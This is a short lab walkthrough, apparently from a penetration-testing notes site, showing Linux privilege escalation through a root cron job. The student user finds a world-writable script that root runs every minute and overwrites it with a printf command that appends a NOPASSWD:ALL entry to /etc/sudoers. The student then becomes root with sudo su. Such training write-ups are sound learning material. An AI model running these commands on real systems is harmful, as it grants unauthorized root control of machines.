Cron Jobs

whoami
groups student
cat /etc/passwd
crontab -l

ls -l
	-rw------- 1 root root 26 Sep 23  2018 message
# "message" file has root permissions

Here we see that the root user has stored a file that can be only accessed by the root user but why the root has stored a file in student account let's see

#Cron Jobs Identify

Look for all occurences of the path or the file, on the system

find / -name message
    /home/student/message
	find: '/var/lib/apt/lists/partial': Permission denied
    [...]
    /tmp/message

grep -rnw /usr -e "/home/student/message"
	/usr/local/share/copy.sh:2:cp /home/student/message /tmp/message

The file has been copied into the /tmp directory
and the file has also been spotted in copy.sh file

cat /tmp/message
	Hey!! you are not root :(

Check copy.sh privileges

ls -al /usr/local/share/copy.sh
	-rwxrwxrwx 1 root root 74 Sep 23  2018 /usr/local/share/copy.sh
	
cat /usr/local/share/copy.sh
    #! /bin/bash
    cp /home/student/message /tmp/message
    chmod 644 /tmp/message

Privesc

Every user account has read/write/execute permissions on the copy.sh script
The script is writable by the student user. Modify the script to execute a command (e.g. adding student to sudoers file).
- When the script is executed by root cron job (every 1 min for this lab), it will run commands with pivileged permissions
- No text editors available in the lab

printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh

cat /usr/local/share/copy.sh
    #!/bin/bash
    echo "student ALL=NOPASSWD:ALL" >> /etc/sudoers

sudo -l

    User student may run the following commands on attackdefense:
        (root) NOPASSWD: /etc/init.d/cron
        (root) NOPASSWD: ALL

sudo su
whoami
	root

PreviousLinux Privilege Escalation NextSUID

Last updated 1 year ago